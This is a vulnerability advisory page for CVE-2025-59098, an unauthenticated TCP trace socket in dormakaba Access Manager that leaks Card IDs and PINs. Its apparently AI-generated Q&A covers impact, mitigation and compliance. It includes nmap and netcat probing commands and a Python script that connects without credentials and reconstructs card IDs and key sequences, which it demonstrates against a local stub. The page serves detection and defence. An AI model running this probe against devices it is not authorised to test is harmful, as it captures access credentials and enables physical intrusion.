CVE-2025-59098
Unauthenticated TCP Trace Data Exposure in dormakaba Access Manager
Publication date: 2026-01-26
Last updated on: 2026-01-26
Assigner: SEC Consult Vulnerability Lab
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dormakaba | access_manager | * |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-497 | The product does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the product does. |
AI Powered Q&A
Can you explain this vulnerability to me?
The Access Manager's trace (debug) functionality streams its output over a TCP socket to any client that connects; the socket requires no authentication and the data is not encrypted. An attacker who can reach the socket over the network receives the trace output, which includes Card IDs and every button press on Registration units, so PINs typed at the readers are exposed in clear text. The verbosity of the trace output is configured through the device's HTTP(S) or SOAP interfaces, so an attacker who can reach those interfaces can raise the verbosity and increase the amount of sensitive information the socket leaks.
How can this vulnerability impact me?
The vulnerability discloses Card IDs and the PINs entered on Registration units to anyone with network access to the trace socket. Because these are the credentials the access control system checks, an attacker who captures them can use them to gain unauthorized physical access to the areas the affected devices protect, in addition to the privacy impact of the data disclosure itself.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The distinguishing property is a TCP port on the Access Manager that hands out trace data to a client that has not authenticated. The advisory text shown on this page does not name the port number, so first enumerate the device's open ports and service banners with nmap, for example `nmap -sV -p- <target-ip>` (or `nmap -sV -p <port> <target-ip>` once the port is known). Then connect to the candidate port with netcat, `nc <target-ip> <port>`, and watch for output: if trace lines appear without any login or handshake, the socket is exposed. Generate a card read or a button press on a Registration unit while connected to confirm that reader events are included. On the monitoring side, a network sensor that sees clear-text trace output (reader events, Card IDs, key presses) leaving the device to a host other than an administrator workstation is a reliable indicator that the trace socket is reachable.
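The check described above, written as an added example that is not part of the advisory, the page, or dormakaba's software: connect to a TCP port with no credentials, collect whatever arrives within a listening window, and report what an unauthenticated client obtained. The target host and port are parameters you supply; the trace line format used here (`event=card_read`, `event=key_press`) and the stub emitter that produces it are constructed for this example, since the real Access Manager trace format is not documented on this page.

```python
"""Probe a TCP trace socket for unauthenticated data exposure.

Added example (not from the advisory or the vendor). The sample trace lines,
their field names, and the stub emitter are constructed stand-ins for
"debug output that carries card IDs and reader key presses".
"""

import re
import socket
import threading
import time

# Constructed sample lines; the field names are an assumption for this example.
SAMPLE_TRACE = [
    b"TRACE reader=1 event=card_read id=0123456789\n",
    b"TRACE reader=1 event=key_press key=4\n",
    b"TRACE reader=1 event=key_press key=2\n",
    b"TRACE reader=1 event=key_press key=7\n",
    b"TRACE reader=1 event=key_press key=1\n",
]

KEY_PRESS = re.compile(rb"event=key_press key=(\S)")
CARD_READ = re.compile(rb"event=card_read id=(\S+)")


def probe_trace_socket(host, port, listen_seconds=3.0):
    """Connect without any credentials and collect what the service sends.

    Returns the raw bytes received. Any non-empty result means the socket
    hands trace output to an unauthenticated client; an empty result within
    the window means nothing was volunteered (it may still require a trigger
    such as a card read, so re-run while generating reader activity).
    """
    received = bytearray()
    deadline = time.monotonic() + listen_seconds
    with socket.create_connection((host, port), timeout=listen_seconds) as sock:
        sock.settimeout(0.5)  # poll in short slices until the window ends
        while time.monotonic() < deadline:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                continue
            if not chunk:  # peer closed the connection
                break
            received.extend(chunk)
    return bytes(received)


def assess_exposure(data):
    """Summarize what an unauthenticated listener obtained.

    Parsing uses the constructed field names above, so the card_ids and
    key_sequence values only apply to that format; 'exposed' is format-agnostic.
    """
    keys = b"".join(KEY_PRESS.findall(data))
    return {
        "exposed": len(data) > 0,
        "lines": len(data.splitlines()),
        "card_ids": [c.decode() for c in CARD_READ.findall(data)],
        "key_sequence": keys.decode(),
    }


def start_stub_emitter(lines=SAMPLE_TRACE):
    """Constructed stand-in for an unauthenticated trace socket on localhost.

    Accepts one client and streams the sample lines with no login step,
    then closes. Returns the ephemeral port it listens on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            for line in lines:
                conn.sendall(line)
                time.sleep(0.05)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    # Self-test against the stub; replace host/port with the real device
    # (target and port are assumptions you must supply) for a live check.
    port = start_stub_emitter()
    captured = probe_trace_socket("127.0.0.1", port, listen_seconds=2.0)
    print(assess_exposure(captured))
```

Against the stub, the unauthenticated client receives every line, and the reconstructed key sequence shows why a trace that logs button presses is equivalent to logging PINs. Against a real device, treat any non-empty `probe_trace_socket` result as confirmation that the socket is reachable without authentication, regardless of whether the parser recognizes the format.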
What immediate steps should I take to mitigate this vulnerability?
First, disable the trace functionality if it is not needed; a debug channel that is switched off leaks nothing. Where it must stay on, restrict reachability of the trace TCP port at the network layer (segmentation, firewall or ACL rules) so that only administrator workstations can connect; since the socket itself has no authentication or encryption, the network boundary is the only control. Because the verbosity level is set through the HTTP(S) or SOAP interfaces, also restrict access to those interfaces, change the service interface password from any default, and avoid device identifiers that an attacker could guess, so that an attacker cannot turn the verbosity up. Finally, treat Card IDs and PINs that may already have been observed as compromised and rotate them.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
Card IDs and PINs are personal data tied to identifiable individuals, and the trace socket discloses them without authentication or encryption. Regulations such as GDPR and HIPAA require appropriate technical measures to protect such data against unauthorized access and to preserve its confidentiality, so an exposed trace socket on a production system is likely to be assessed as a failure of those safeguards, and an actual capture of the data may constitute a reportable breach.